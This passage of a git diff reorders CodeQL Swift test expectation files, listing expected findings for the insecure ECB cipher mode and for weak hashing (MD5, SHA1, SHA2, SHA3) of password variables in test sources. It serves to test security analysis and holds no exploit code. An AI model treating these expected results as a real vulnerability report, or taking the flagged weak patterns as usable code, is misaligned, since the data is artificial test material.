getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:73:42:73:58 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | edges | test.swift:39:9:39:13 | call to ECB.init() | test.swift:60:37:60:53 | call to getECBBlockMode() | provenance | | | test.swift:39:9:39:13 | call to ECB.init() | test.swift:61:37:61:53 | call to getECBBlockMode() | provenance | | @@ -28,3 +18,13 @@ nodes | test.swift:72:42:72:46 | call to ECB.init() | semmle.label | call to ECB.init() | | test.swift:73:42:73:58 | call to getECBBlockMode() | semmle.label | call to getECBBlockMode() | subpaths +#select +| test.swift:56:37:56:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:56:37:56:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | +| test.swift:57:37:57:37 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:57:37:57:37 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | +| test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | test.swift:58:37:58:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:58:37:58:41 | call to ECB.init() | call to ECB.init() | +| test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | test.swift:59:37:59:41 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:59:37:59:41 | call to ECB.init() | call to ECB.init() | +| test.swift:60:37:60:53 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:60:37:60:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | +| test.swift:61:37:61:53 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:61:37:61:53 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | +| test.swift:71:42:71:42 | ecb | test.swift:50:12:50:16 | call to ECB.init() | test.swift:71:42:71:42 | ecb | The initialization of the cipher 'ecb' uses the insecure ECB block mode from $@. | test.swift:50:12:50:16 | call to ECB.init() | call to ECB.init() | +| test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | test.swift:72:42:72:46 | call to ECB.init() | The initialization of the cipher 'call to ECB.init()' uses the insecure ECB block mode from $@. | test.swift:72:42:72:46 | call to ECB.init() | call to ECB.init() | +| test.swift:73:42:73:58 | call to getECBBlockMode() | test.swift:39:9:39:13 | call to ECB.init() | test.swift:73:42:73:58 | call to getECBBlockMode() | The initialization of the cipher 'call to getECBBlockMode()' uses the insecure ECB block mode from $@. | test.swift:39:9:39:13 | call to ECB.init() | call to ECB.init() | diff --git a/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected b/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected index 2b0eed8d0c2b..273f26164fd7 100644 --- a/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected +++ b/swift/ql/test/query-tests/Security/CWE-328/WeakPasswordHashing.expected @@ -1,52 +1,3 @@ -#select -| testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:84:47:84:47 | passwd | password (passwd) | -| testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:85:52:85:52 | passwd | password (passwd) | -| testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:91:36:91:36 | passwd | password (passwd) | -| testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:92:45:92:45 | passwd | password (passwd) | -| testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:98:44:98:44 | passwd | password (passwd) | -| testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:99:53:99:53 | passwd | password (passwd) | -| testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:105:37:105:37 | passwd | password (passwd) | -| testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:106:46:106:46 | passwd | password (passwd) | -| testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:112:37:112:37 | passwd | password (passwd) | -| testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:113:46:113:46 | passwd | password (passwd) | -| testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:119:37:119:37 | passwd | password (passwd) | -| testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:120:46:120:46 | passwd | password (passwd) | -| testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:129:23:129:23 | passwd | password (passwd) | -| testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:138:23:138:23 | passwd | password (passwd) | -| testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:147:23:147:23 | passwd | password (passwd) | -| testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:156:23:156:23 | passwd | password (passwd) | -| testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:165:23:165:23 | passwd | password (passwd) | -| testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:174:32:174:32 | passwd | password (passwd) | -| testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:183:32:183:32 | passwd | password (passwd) | -| testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:192:32:192:32 | passwd | password (passwd) | -| testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:201:32:201:32 | passwd | password (passwd) | -| testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:210:32:210:32 | passwd | password (passwd) | -| testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:220:49:220:49 | passwordData | password (passwordData) | -| testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | testCryptoKit.swift:224:38:224:38 | passwordString | testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:224:38:224:38 | passwordString | password (passwordString) | -| testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:154:30:154:30 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:157:31:157:31 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:160:47:160:47 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:163:47:163:47 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:167:20:167:20 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:170:21:170:21 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:173:23:173:23 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:176:21:176:21 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:179:21:179:21 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:183:9:183:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:186:9:186:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:189:9:189:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:192:9:192:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:195:9:195:9 | passwdArray | password (passwdArray) | -| testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:201:9:201:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:204:9:204:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:207:9:207:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:210:9:210:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:213:9:213:9 | passwdData | password (passwdData) | -| testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:219:9:219:9 | passwd | password (passwd) | -| testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:222:9:222:9 | passwd | password (passwd) | -| testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:225:9:225:9 | passwd | password (passwd) | -| testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:228:9:228:9 | passwd | password (passwd) | -| testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:231:9:231:9 | passwd | password (passwd) | edges | testCryptoKit.swift:224:38:224:38 | passwordString | testCryptoKit.swift:224:38:224:53 | .utf8 | provenance | | | testCryptoKit.swift:224:38:224:53 | .utf8 | testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | provenance | | @@ -102,3 +53,52 @@ nodes | testCryptoSwift.swift:228:9:228:9 | passwd | semmle.label | passwd | | testCryptoSwift.swift:231:9:231:9 | passwd | semmle.label | passwd | subpaths +#select +| testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | testCryptoKit.swift:84:47:84:47 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:84:47:84:47 | passwd | password (passwd) | +| testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | testCryptoKit.swift:85:52:85:52 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:85:52:85:52 | passwd | password (passwd) | +| testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | testCryptoKit.swift:91:36:91:36 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:91:36:91:36 | passwd | password (passwd) | +| testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | testCryptoKit.swift:92:45:92:45 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:92:45:92:45 | passwd | password (passwd) | +| testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | testCryptoKit.swift:98:44:98:44 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:98:44:98:44 | passwd | password (passwd) | +| testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | testCryptoKit.swift:99:53:99:53 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:99:53:99:53 | passwd | password (passwd) | +| testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | testCryptoKit.swift:105:37:105:37 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:105:37:105:37 | passwd | password (passwd) | +| testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | testCryptoKit.swift:106:46:106:46 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:106:46:106:46 | passwd | password (passwd) | +| testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | testCryptoKit.swift:112:37:112:37 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:112:37:112:37 | passwd | password (passwd) | +| testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | testCryptoKit.swift:113:46:113:46 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:113:46:113:46 | passwd | password (passwd) | +| testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | testCryptoKit.swift:119:37:119:37 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:119:37:119:37 | passwd | password (passwd) | +| testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | testCryptoKit.swift:120:46:120:46 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:120:46:120:46 | passwd | password (passwd) | +| testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | testCryptoKit.swift:129:23:129:23 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:129:23:129:23 | passwd | password (passwd) | +| testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | testCryptoKit.swift:138:23:138:23 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:138:23:138:23 | passwd | password (passwd) | +| testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | testCryptoKit.swift:147:23:147:23 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:147:23:147:23 | passwd | password (passwd) | +| testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | testCryptoKit.swift:156:23:156:23 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:156:23:156:23 | passwd | password (passwd) | +| testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | testCryptoKit.swift:165:23:165:23 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:165:23:165:23 | passwd | password (passwd) | +| testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | testCryptoKit.swift:174:32:174:32 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoKit.swift:174:32:174:32 | passwd | password (passwd) | +| testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | testCryptoKit.swift:183:32:183:32 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoKit.swift:183:32:183:32 | passwd | password (passwd) | +| testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | testCryptoKit.swift:192:32:192:32 | passwd | Insecure hashing algorithm (SHA256) depends on $@. | testCryptoKit.swift:192:32:192:32 | passwd | password (passwd) | +| testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | testCryptoKit.swift:201:32:201:32 | passwd | Insecure hashing algorithm (SHA384) depends on $@. | testCryptoKit.swift:201:32:201:32 | passwd | password (passwd) | +| testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | testCryptoKit.swift:210:32:210:32 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:210:32:210:32 | passwd | password (passwd) | +| testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | testCryptoKit.swift:220:49:220:49 | passwordData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:220:49:220:49 | passwordData | password (passwordData) | +| testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | testCryptoKit.swift:224:38:224:38 | passwordString | testCryptoKit.swift:224:33:224:57 | call to Data.init(_:) | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoKit.swift:224:38:224:38 | passwordString | password (passwordString) | +| testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | testCryptoSwift.swift:154:30:154:30 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:154:30:154:30 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | testCryptoSwift.swift:157:31:157:31 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:157:31:157:31 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | testCryptoSwift.swift:160:47:160:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:160:47:160:47 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | testCryptoSwift.swift:163:47:163:47 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:163:47:163:47 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | testCryptoSwift.swift:167:20:167:20 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:167:20:167:20 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | testCryptoSwift.swift:170:21:170:21 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:170:21:170:21 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | testCryptoSwift.swift:173:23:173:23 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:173:23:173:23 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | testCryptoSwift.swift:176:21:176:21 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:176:21:176:21 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | testCryptoSwift.swift:179:21:179:21 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:179:21:179:21 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | testCryptoSwift.swift:183:9:183:9 | passwdArray | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:183:9:183:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | testCryptoSwift.swift:186:9:186:9 | passwdArray | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:186:9:186:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | testCryptoSwift.swift:189:9:189:9 | passwdArray | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:189:9:189:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | testCryptoSwift.swift:192:9:192:9 | passwdArray | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:192:9:192:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | testCryptoSwift.swift:195:9:195:9 | passwdArray | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:195:9:195:9 | passwdArray | password (passwdArray) | +| testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | testCryptoSwift.swift:201:9:201:9 | passwdData | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:201:9:201:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | testCryptoSwift.swift:204:9:204:9 | passwdData | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:204:9:204:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | testCryptoSwift.swift:207:9:207:9 | passwdData | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:207:9:207:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | testCryptoSwift.swift:210:9:210:9 | passwdData | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:210:9:210:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | testCryptoSwift.swift:213:9:213:9 | passwdData | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:213:9:213:9 | passwdData | password (passwdData) | +| testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | testCryptoSwift.swift:219:9:219:9 | passwd | Insecure hashing algorithm (MD5) depends on $@. | testCryptoSwift.swift:219:9:219:9 | passwd | password (passwd) | +| testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | testCryptoSwift.swift:222:9:222:9 | passwd | Insecure hashing algorithm (SHA1) depends on $@. | testCryptoSwift.swift:222:9:222:9 | passwd | password (passwd) | +| testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | testCryptoSwift.swift:225:9:225:9 | passwd | Insecure hashing algorithm (SHA512) depends on $@. | testCryptoSwift.swift:225:9:225:9 | passwd | password (passwd) | +| testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | testCryptoSwift.swift:228:9:228:9 | passwd | Insecure hashing algorithm (SHA2) depends on $@. | testCryptoSwift.swift:228:9:228:9 | passwd | password (passwd) | +| testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | testCryptoSwift.swift:231:9:231:9 | passwd | Insecure hashing algorithm (SHA3) depends on $@. | testCryptoSwift.swift:231:9:231:9 | passwd | password (passwd) | diff --git a/swift/ql/test/query-tests/Security/CWE-328/WeakSensitiveDataHashing.expected 